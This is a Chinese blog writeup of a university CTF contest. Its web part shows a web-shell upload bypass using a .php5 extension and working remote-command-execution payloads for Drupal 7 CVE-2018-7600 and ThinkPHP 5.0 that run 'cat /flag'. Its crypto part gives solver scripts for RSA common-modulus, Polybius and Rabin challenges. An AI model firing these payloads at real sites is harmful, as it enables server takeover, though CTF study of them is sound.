CUMT-CTF第一次双月赛Writeup

最新推荐文章于 2024-02-22 22:28:57 发布
最新推荐文章于 2024-02-22 22:28:57 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: Writeup 文章标签: CTF Web Crypto
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gar_denia/article/details/88080425
版权

前言

知其然,知其所以然

正文

WEB

ez-upload

题目描述是可以上传图片的,就随手上传一张图片上去

回显出目录结构如下:

访问URL发现可以看到上传的图片:

知道了上传目录,现在要做的就是上传成功一个Web Shell。

连接Cknife,写了个php小马,上传发现不可以上传以php结尾的文件。

第一次抓包尝试加00截断,未果。

第二次将后缀改成1.php.abc可以成功上传,但是设置Cknife需要连接的时候发现connection:close,应该是不能将上传的1.php.abc成功解析,未果。

第三次将后缀改成php5,可以上传成功,连接Cknife,成功进入,应该这次可以将haha.php5成功解析:

在upload文件夹中找了半天,全都是别人上传的文件,最后在根目录发现了flag:

CVE

hint不需要扣分,就窥视了一下,提示是drupal7的CVE漏洞。

Google一波,看看大佬写的博客,贴个链接:

https://www.menzel3.fun/2018/08/02/Drupal CVE2018-7600/#Drupal7-

https://www.jianshu.com/p/7c410db788ed

先创建账号,发现不可以发送email,Google到的结果告诉我更换新密码的页面是存在漏洞的,所以输入用户名的时候直接拿bp截断,构造post:

?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=system&name%5B%23markup%5D=ls%20/&name%5B%23type%5D=markup

form_id=user_pass&_triggering_element_name=name

这里原来的命令需要修改,将其改为ls%20/,目的是查看根目录,Go一下回显form_build_id:

保留这个form_build_id,用Hackbar post一下这个form_build_id,如下图:

抓包截断,go一下回显根目录,发现flag文件,

下一步就是尝试打开这个flag文件,所以重复上述操作,将之前的ls命令换成cat%20/flag即可。(需要注意的是这里的空格需要使用url编码%20,之前没有注意到这个点,导致回显不出数据)

tp5

是个新题正好是前段时间爆出来的新漏洞:ThinkPHP 5.0 & 5.1远程命令执行漏洞,前些日子看合天公众号推送了一篇类似的文章正好派上用场:click here

题目提示是tp5.0版本,文章直接有payload:

命令执行:

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[系统命令]

ls /列出根目录下的所有目录,发现flag文件;

Fxggu6.md.png

然后直接查看flag文件即可:

FxgqDf.png

payload:

http://219.219.61.234:10005/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

Crypto

之前还没有认真学习过密码学的东西,好在期末好好复习了密码学,现在已经对密码学的知识有了个初步的认识,来温习一下上次的crypto

现代密码签到题

拿到这题,看到n,c1,c2,e1,e2基本已经锁定这一题就是RSA的共模攻击,但是所给的参数全部都是字母,按理说应该都是数字才对,所以最难的工作就是将这一堆的字母转化为可用的数字;

先统计一下字母的出现频率:

#coding:utf-8
n="ZZTOBOTBBISBBSOIIAbZAbZOAgObAEEgIBSBgBTIZAEgZTTZZbBEIOTEASTBBBAOEIZgETBSATESOZgZAZOZbTOIbSSIBIgOSZAEOTTgOOATSSBAbbAgOAAOOIOZAIAIABSZBEZBbABEIEOTOZbIbOSTZTAbgBATEbIIIAgSOBTgBBbgTObEATSOIgEISBEIITbEZTIOTOOTBTZZBOIbABOIZTbTTEgEbAggZgSEOAIbSgBbBbOZTESAZIbAZZSbSgEAASgOISIbIgZTbIEbOTgOZBEISAZBSTgTTBSgbIZSgbZBZESEbTgEZTTTEEOETZTOOAAOTZbZIgTZEISBbEZASggIBIgBESTZbZZAOASgOESAOBASAITBBObZZbZIbASIOIAObOSBbBIZZAIOEBBOgOITAAZOIATTSZAOBSSAIZgTBgTbOgOZEOOBgBOAbZTEgOgOOTBSZBIBATAOEOTTObggbATbATEbEOISIOZIIBgSbTETbTEgAIESAZITbgZbgbOAAgbgbgSEOBSObAEbSTEIAZSbSSTEABTSBESOTOETESbgAABABOEgBbAEBZEEgZIbZbbbTObTESbTABBBTISOBgZSEIIISABOI"
c1="ZZEZZOESZTSbbEZETOAIbAbBgETTOASIgEESOgEZATOIgIEABAEOEEEBOTbZIObOESAZbIZTSBgSbZbZBbgbAOBZZABbATOIZIIAgAZAABSSTIEbIOOTAZIZgEbTSSIbEEBBZZIgSZBOEIETgAggIIEbOABIAOgIBBAZATIZIgBAOZbESEbEEBBBbZSOAgZbBZTEgAEbAIOOIEAEbbSIIbITZOTZSBSSABABbbbgOOBATBBTZIEAgSSSbbZOIgBTgOBISOIIIEZZZggbIZEEOSSEEOOgEZSgbAETTTgBBgZTOEIbISZIBSZBOSgSbBIIZIgSbEBBEEIZBgbEEOISbZgBbZIbTAbBAESEgIgSATSSBIZTgZOgZSTObBAZBOBgIATbZIggOIIOSAgSSBIbSEAgTTbTSZbTEgSOOgSTSEATBZOEBTOTEABEgZBAZSObbSEbEbIABZTTABgZETOgbgSZOTAOEOAZBTASbSSSSOBgEEETZTBZEZTSObSbgOIOTTZSETAgTSAITbAEIIAZgOSZZIbZgIIgBgEZOgZbITTgZbASZSEgOIATBgIOBOISgZBTBZOESbABbIIIBgIZOASAbAgSgBEZSbbOSIEbI"
c2="IBTOZOIOOASIBTOISSSbSABbgIbAZEgAgBZBESbbgZbZIATZEOZIZTEIEOggEBbTSZZbASBSSSZIOAZSgTZAZgAIBAAgZTEAIOSESEBTgBSgEIOEbTIIBSAZbSbZEgOSObbBOSbbSTSIBOEZbgIObBBOTAbTbgOOEATBgOOTgIOggSgOZEgSIEgZSAAgTABBIAOTSgOAOITATISBSSTZBABATESSbAgOSbSASOObZbbATObAAgIZBAISBEATBTgbIgATZbbZSgTBgTBSgbZgZZZEBTOIIEAOTgTZOAIAZZBAIAObbIgEOTIAgSEOAbIZEAIOSZgBTASSbISgEOOZESEbBZEBOIAggZbgTTEESTIBbOBTASZTATSOOBAObAOAIgEbSOIISSAAZIIBEOETSOSbSEAbIZBbTEZTAOgBETOZTAOBZZbTIIABOASbIgAgTbbTIBASBbIZEbSTZBSbOAObIBTSbSEgOgSbTBZZEZBgIAObSEETTgTTEEAAAbAOESISIBTTSABTbAgBIggTBZbZEbEbITZbSTgTgBZBAEITgbEOBBBTZgAOTZEBAgbbSOgBTTZOAZBTOBZITIISZSTgBgOOTBbTEEIbgBEgT"
e1="IIIBTZBg"
e2="gbATZgI"
def count_each_char_1(string):
    res = {}
    for i in string:
        if i not in res:
            res[i] = 1
        else:
            res[i] += 1
    return res

print "n:"+str((count_each_char_1(n)))
print "c1:"+str((count_each_char_1(c1)))
print "c2:"+str((count_each_char_1(c2)))
print "e1:"+str((count_each_char_1(e1)))
print "e2:"+str((count_each_char_1(e2)))

Result

n:{'A': 65, 'B': 63, 'E': 56, 'g': 52, 'I': 60, 'O': 72, 'S': 56, 'b': 62, 'T': 69, 'Z': 62}
c1:{'A': 55, 'b': 62, 'E': 66, 'g': 60, 'I': 67, 'O': 58, 'S': 65, 'B': 59, 'T': 53, 'Z': 72}
c2:{'A': 67, 'B': 61, 'E': 51, 'g': 60, 'I': 57, 'O': 63, 'S': 66, 'b': 63, 'T': 70, 'Z': 59}
e1:{'I': 3, 'Z': 1, 'B': 2, 'T': 1, 'g': 1}
e2:{'A': 1, 'b': 1, 'g': 2, 'I': 1, 'T': 1, 'Z': 1}

发现总共就出现了10个字母A,B,E,g,I,O,S,b,T,Z,猜想这10个字母对应的是0-9的10个数字,如何将字母和数字进行对应是个头疼的问题;想了半天,没办法,只能暴力破解,产生字母的全排列对应10个数字…

暴力破解脚本(借鉴队友脚本学习了一下)

#coding:utf-8
import gmpy2
import base64
import itertools

def main():
	dic_alp1=['O','T','A','B','b','Z','I','E','S','g']
	dic_num=['0','1','2','3','4','5','6','7','8','9']
	dic_alp2=list(itertools.permutations(dic_alp1))
	for x in dic_alp2:
		n="ZZTOBOTBBISBBSOIIAbZAbZOAgObAEEgIBSBgBTIZAEgZTTZZbBEIOTEASTBBBAOEIZgETBSATESOZgZAZOZbTOIbSSIBIgOSZAEOTTgOOATSSBAbbAgOAAOOIOZAIAIABSZBEZBbABEIEOTOZbIbOSTZTAbgBATEbIIIAgSOBTgBBbgTObEATSOIgEISBEIITbEZTIOTOOTBTZZBOIbABOIZTbTTEgEbAggZgSEOAIbSgBbBbOZTESAZIbAZZSbSgEAASgOISIbIgZTbIEbOTgOZBEISAZBSTgTTBSgbIZSgbZBZESEbTgEZTTTEEOETZTOOAAOTZbZIgTZEISBbEZASggIBIgBESTZbZZAOASgOESAOBASAITBBObZZbZIbASIOIAObOSBbBIZZAIOEBBOgOITAAZOIATTSZAOBSSAIZgTBgTbOgOZEOOBgBOAbZTEgOgOOTBSZBIBATAOEOTTObggbATbATEbEOISIOZIIBgSbTETbTEgAIESAZITbgZbgbOAAgbgbgSEOBSObAEbSTEIAZSbSSTEABTSBESOTOETESbgAABABOEgBbAEBZEEgZIbZbbbTObTESbTABBBTISOBgZSEIIISABOI"
		c1="ZZEZZOESZTSbbEZETOAIbAbBgETTOASIgEESOgEZATOIgIEABAEOEEEBOTbZIObOESAZbIZTSBgSbZbZBbgbAOBZZABbATOIZIIAgAZAABSSTIEbIOOTAZIZgEbTSSIbEEBBZZIgSZBOEIETgAggIIEbOABIAOgIBBAZATIZIgBAOZbESEbEEBBBbZSOAgZbBZTEgAEbAIOOIEAEbbSIIbITZOTZSBSSABABbbbgOOBATBBTZIEAgSSSbbZOIgBTgOBISOIIIEZZZggbIZEEOSSEEOOgEZSgbAETTTgBBgZTOEIbISZIBSZBOSgSbBIIZIgSbEBBEEIZBgbEEOISbZgBbZIbTAbBAESEgIgSATSSBIZTgZOgZSTObBAZBOBgIATbZIggOIIOSAgSSBIbSEAgTTbTSZbTEgSOOgSTSEATBZOEBTOTEABEgZBAZSObbSEbEbIABZTTABgZETOgbgSZOTAOEOAZBTASbSSSSOBgEEETZTBZEZTSObSbgOIOTTZSETAgTSAITbAEIIAZgOSZZIbZgIIgBgEZOgZbITTgZbASZSEgOIATBgIOBOISgZBTBZOESbABbIIIBgIZOASAbAgSgBEZSbbOSIEbI"
		c2="IBTOZOIOOASIBTOISSSbSABbgIbAZEgAgBZBESbbgZbZIATZEOZIZTEIEOggEBbTSZZbASBSSSZIOAZSgTZAZgAIBAAgZTEAIOSESEBTgBSgEIOEbTIIBSAZbSbZEgOSObbBOSbbSTSIBOEZbgIObBBOTAbTbgOOEATBgOOTgIOggSgOZEgSIEgZSAAgTABBIAOTSgOAOITATISBSSTZBABATESSbAgOSbSASOObZbbATObAAgIZBAISBEATBTgbIgATZbbZSgTBgTBSgbZgZZZEBTOIIEAOTgTZOAIAZZBAIAObbIgEOTIAgSEOAbIZEAIOSZgBTASSbISgEOOZESEbBZEBOIAggZbgTTEESTIBbOBTASZTATSOOBAObAOAIgEbSOIISSAAZIIBEOETSOSbSEAbIZBbTEZTAOgBETOZTAOBZZbTIIABOASbIgAgTbbTIBASBbIZEbSTZBSbOAObIBTSbSEgOgSbTBZZEZBgIAObSEETTgTTEEAAAbAOESISIBTTSABTbAgBIggTBZbZEbEbITZbSTgTgBZBAEITgbEOBBBTZgAOTZEBAgbbSOgBTTZOAZBTOBZITIISZSTgBgOOTBbTEEIbgBEgT"
		e1="IIIBTZBg"
		e2="gbATZgI"
		for i in range(10):
			n=n.replace(x[i],dic_num[i])
			c1=c1.replace(x[i],dic_num[i])
			c2=c2.replace(x[i],dic_num[i])
			e1=e1.replace(x[i],dic_num[i])
			e2=e2.replace(x[i],dic_num[i])

		n=int(n,10)
		c1=int(c1,10)
		c2=int(c2,10)
		e1=int(e1,10)
		e2=int(e2,10)
		if gmpy2.gcd(e1,e2)!=1:
			continue
		else:
			mgcd,s,t=gmpy2.gcdext(e1,e2)
			if s<0:
				try:
					s=-s
					c1=gmpy2.invert(c1,n)
				except ZeroDivisionError:
					continue
			if t<0:
				try:
					t=-t
					c2=gmpy2.invert(c2,n)
				except ZeroDivisionError:
					continue
			plain=pow(c1,s,n)*pow(c2,t,n)%n
			try:
				ans = '{:x}'.format(plain).decode('hex')
				if 'flag' in ans:
					print ans
					print x
					break
			except TypeError:
				pass
			
if __name__ == '__main__':
	main()

先用出现字母的全排列对应表0-9这10个数,然后将所有参数用数字表示,用RSA的共模攻击求出最后的结果,发现flag:

kS6qQ1.md.png

最后发现是与数字形状相似的字母代替数字产生的参数…

**attention:**其实可以对脚本进行优化,因为e1e2都是和φ(n)互素的,所以e1e2都是奇数,所以可以缩小e1e2的范围,最后一个数字都是奇数,即:gI都是奇数;

古典密码签到题

这题直接告诉是棋盘密码,比较简单,给出的密文里总共有ksynb5个字母,所以直接构造这5个字母的全排列对应26字母表即可,总共有5!=120种不同的结果,可以直接暴破;

暴力破解脚本:

#coding:utf-8
import itertools

key=[]
cipher="ksyssskkysynbssbbnynnb"
dic_cip=list(itertools.permutations("ksynb"))
for x in dic_cip:
    key.append(''.join(x))

for child_key in key:
    num_c=""
    ans=""
    for now_c in cipher:
        num_c+=str(child_key.index(now_c))
    for i in range(0,len(num_c),2):
        now_ascii=int(num_c[i])*5+int(num_c[i+1])+97
        if now_ascii>ord("i"):
            now_ascii+=1
        else:
            pass
        ans+=chr(now_ascii)
    if 'flag' in ans:
        print child_key,ans

发现有两种结果里面有flag字符,显然是第一个,排列方式为skynb

kS4Yuj.png

First level

题目给出e=2,基本已经锁定是RSA的衍生算法rabin,yafu分解n得到p和q如下:

PRP617 = 28349223152666012309896421767725787316124897111416473420803849019741154117582482568645254183215552986563114855665416593397403745371086355268654763921803558654340155902194948080056226592560917521612824589013349044205989541259468856602228462903448721105774109966325479530181197156476502473067978072053273437369680433495259118953717909524799086692640103084287064091489681162498108275295255082627807077949841602061428289272700263987438087045434043977981316071156426134695316796020506076336851840708593720052204359360366058549157961154869248835793804817253083037277453771408544063058190126149127240681909811943783388977967
PRP617 = 28349223152666012309896421767725787316124897111416473420803849019741154117582482568645254183215552986563114855665416593397403745371086355268654763921803558654340155902194948080056226592560917521612824589013349044205989541259468856602228462903448721105774109966325479530181197156476502473067978072053273437369680433495259118953717909524799086692640103084287064091489681162498101607280822202773532998098050880803631144514377948079277690787622279940743498439084904702494445241729763146426258407468147831250550239995285695193105630324823153678214290802694619958991541957383815098042054239547145549933872335482492225099839

ans = 1

eof; done processing batchfile

攻击脚本:

#coding:utf-8
import gmpy2
c=499900287907163903863770127517451824950591449854220282014018552802396943304674724533357663876916175459043411887269615620980351359674373127551283923032759205525834407466303318140213222438375548066871397251493100247836770129792554768759516349058673615081761638343932256849889604058608747531941928982832585706361391950223948529046950139043176720742038526998231448270490097134641169635210567151369533018545746204046992368621334939029582400285322777365958482219075297507215203709356125635202625121091161318566582307478931230962853531285514124459092351456397307588024613094226807792165876133269038363995037219677926220967578191033480631890589761476293394613074763877465067481353073032261829035532832262390121385388328585967620567497069930361644409182632934629875953161754678971744082331335000439916510067572742641854184303838362027247026467270857712018679364014951870327424723286991989268813839644982317838329022551033151317911958707603833070206941532496854730739054206016872958750645705043270396511543390465607172543992216405734971188437702405334334961918445724163241075322921116618280425131683507843396376626705861243420399065472311770119489811395486846742327683616439776584876654620796349661745998246254486950516901889112077176621805823
p=28349223152666012309896421767725787316124897111416473420803849019741154117582482568645254183215552986563114855665416593397403745371086355268654763921803558654340155902194948080056226592560917521612824589013349044205989541259468856602228462903448721105774109966325479530181197156476502473067978072053273437369680433495259118953717909524799086692640103084287064091489681162498108275295255082627807077949841602061428289272700263987438087045434043977981316071156426134695316796020506076336851840708593720052204359360366058549157961154869248835793804817253083037277453771408544063058190126149127240681909811943783388977967
q=28349223152666012309896421767725787316124897111416473420803849019741154117582482568645254183215552986563114855665416593397403745371086355268654763921803558654340155902194948080056226592560917521612824589013349044205989541259468856602228462903448721105774109966325479530181197156476502473067978072053273437369680433495259118953717909524799086692640103084287064091489681162498101607280822202773532998098050880803631144514377948079277690787622279940743498439084904702494445241729763146426258407468147831250550239995285695193105630324823153678214290802694619958991541957383815098042054239547145549933872335482492225099839

def rabin_decrypt(c, p, q, e=2):
    n = p * q
    mp = pow(c, (p + 1) / 4, p)
    mq = pow(c, (q + 1) / 4, q)
    yp = gmpy2.invert(p, q)
    yq = gmpy2.invert(q, p)
    r = (yp * p * mq + yq * q * mp) % n
    rr = n - r
    s = (yp * p * mq - yq * q * mp) % n
    ss = n - s
    return (r, rr, s, ss)

def main():
    ans=rabin_decrypt(c,p,q,e=2)
    for x in ans:
        temp='{:x}'.format(x).decode('hex')
        if 'flag' in temp:
            print temp

if __name__ == '__main__':
    main()

攻击得到4个结果,经过筛选得到一段含有flag的有意义的明文:

kSbyYn.png

Gard3nia
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CUMT第一轮双月赛Web题解
0verWatch的博客
12-17 930
ez-upload 这个题目作为Web题的第一个题难度刚好,很基础的漏洞点,就考了个文件上传,上来直接用phtml就可以绕过,但是给出来的hint是.htaccess,可能是我非预期了? 菜刀链接获取flag Cve 参考了这篇文章:https://www.menzel3.fun/2018/08/02/Drupal%20CVE2018-7600/#代码执行现场 这是一个Drupal 7的cve...
矿大CTF —— linux
哒君的博客
03-14 663
题目 下载下来后,是一个linux可执行文件,但是放到ida里面却编译不出什么有用的信息。 然后放到linux中运行,发现它还需要libpython2.7.so.1.0文件,于是推测这是一个python写的文件转换成了exe可执行文件。 于是可以用pyinstxtractor.py将其还原为py文件。 还原后,生成如下文件夹: 将re04后缀名改为py,打开即可得...
CUMT-CTF第二次双月赛Writeup
Gard3nia的博客
03-02 1274
前言 毕竟是萌新,能有校赛打已经很开心了,感谢Source大佬的带飞,下面放上本次双月赛的部分题解; 正文 Web 签到题 是个easy的绕过,给出源码: &lt;?php $white_list = range(0,9); require_once('flag.php'); if(isset($_REQUEST['0ver']) &amp;&amp; isset($_REQUEST['0ver1...
Cumtctf2021初夏赛
meteox的博客
08-08 1383
web web签到 根据返回版本信息 PHP/8.1.0-dev,搜索可知是存在后面的版本 验证存在后门 ls cat flag.php 别大E admin/admin弱口令登录,得到flag在flag.php 抓包发现 Content-Type: application/xml;charset=utf-8 X-Requested-With: XMLHttpRequest 可能有xxe漏洞,尝试读取/etc/passwd <?xml version="1.0"?> &
CUMT2017赛宁杯
weixin_34129145的博客
06-07 288
由于下午去学生在线要验收任务,就做了大半天吧 这些题目,学长们都懒得出wp了。。。。我就稍微写点东西吧 upload 打开页面,上传页面,上传绕过,直接上传php,有拦截,修改JS 然后传个大马,掏出bp function check(){ upfile = document.getElementById("upfile"); submit = document.getElementByI...
中国矿业大学CUMT-Stu校园网自动连接
03-16
标题 "中国矿业大学CUMT-Stu校园网自动连接" 指的是一款专为中国矿业大学(CUMT)学生设计的校园网自动连接工具。这个脚本的主要目的是简化学生登录校园网络的过程,使得他们无需手动输入账号和密码,即可自动接入...
中国矿业大学CUMT-Stu校园网自动连接get
最新发布
03-16
标题“中国矿业大学CUMT-Stu校园网自动连接get”揭示了这是一个针对中国矿业大学(CUMT)学生设计的网络连接工具。这个工具的主要功能是自动化处理校园网的登录过程,使得用户无需手动输入账号和密码,即可便捷地接...
中国矿大cumt-采矿测试和模拟技术.pdf
11-20
【标题】:中国矿大cumt-采矿测试和模拟技术.pdf 【描述】:这份文档是中国矿大cumt关于采矿测试和模拟技术的研究生课程资料,着重探讨深井开采矿压显现规律及支护方案。 【标签】:互联网 【正文】: 深井开采...
CUMT-Linux作业by梅苑.docx
03-10
CUMT-Linux作业by梅苑.docx
中国矿大cumt-采矿测试和模拟技术.docx
11-20
【标题】:中国矿大cumt-采矿测试和模拟技术 在现代的矿业工程领域,采矿测试和模拟技术是至关重要的研究方向,特别是在深部开采过程中。深部开采矿压及其控制是确保矿山安全和经济效益的关键因素。本文将探讨深部...
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7737
BUUCTF题目Misc部分wp(持续更新)
CTF练习题WP1
m0_73891130的博客
03-25 622
自己写的CTF常用网站的练习题目的WP,当然也有参考网上的大佬的WP
2023 天使杯CTF --- wp
3tefanie丶zhou的博客
06-03 1233
【人,终究会被年少不可得之物困其一生】
ctf wp 汇总
freshfox的博客
07-06 1094
ctf
【第六届强网杯CTF-Wp】
qq_45603443的博客
08-02 2503
第六届强网杯全国网络安全挑战赛wp
青少年CTF练习WP (持续更新)
HelloWrod6868的博客
02-22 672
青少年CTF练习平台wp
2022年暑期CTF刷题WP(停止更新)
qq_52820087的博客
06-19 3577
2022年暑期CTF刷题之路
动态规划
Gard3nia的博客
02-03 830
前言 最头疼的就是这一块老师上课又飞快,虽然讲的非常好,但是还是有点跟不上节奏,加之老师根本不分析代码,所以自己考前准备自己动手复习一波。 正文 动态规划解决问题的基本方法码一波 (1)找出最优解的性质并刻画其结构特征 (2)递归地定义最优值 (3)以自底向上的方式计算出最优值 (4)根据计算最优值时的信息构造最优解 1.矩阵连乘问题 矩阵连乘的最优值是n个矩阵连乘的最小数乘次数,最优解是得出矩阵...
ctf秀入门 图片篇wp
weixin_56023251的博客
07-06 1118
解压得到flag解压得到一个txt文件,放入010观察 修改后缀为png得到flag解压得到一个bgp文件下载bgp打开工具打开 拿到flag下载附件得到几个文本打开都是乱码都拖到010里看头看尾 发现他们的格式依次是png、jpg、bmp、gif、tif、webp改后缀然后拼接就行......
CUMT梅苑杀手揭秘Sqli-Labs渗透实战:信息窃取与数据库探索
- 第一节从基本的单引号注入开始,通过观察回显错误推断出查询语句可能存在漏洞。利用单引号闭合的方式确认了这是字符型注入。 - 接着尝试猜测数据库表的列数,通过`ORDER BY`语句实现,当尝试`ORDER BY 4`时出现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值